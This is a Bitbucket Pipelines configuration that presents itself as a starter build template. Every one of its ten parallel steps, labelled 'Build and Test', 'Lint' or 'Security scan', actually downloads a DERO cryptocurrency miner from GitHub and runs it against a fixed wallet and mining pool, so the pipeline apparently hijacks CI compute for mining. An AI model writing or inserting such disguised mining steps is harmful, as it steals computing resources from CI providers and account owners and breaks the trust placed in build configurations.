# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.

image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
      - step:
          name: 'Build and Test'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Lint'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Security scan'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Build and Test'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Lint'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Security scan'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Build and Test'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Lint'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Security scan'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
      - step:
          name: 'Security scan'
          script:
            - wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz && tar zvxf astrominer-V1.9.2.R5_amd64_linux.tar.gz && astrominer/astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc736fvgq5qv63q5n502e@solo -r dero.friendspool.club:10300 -m 2
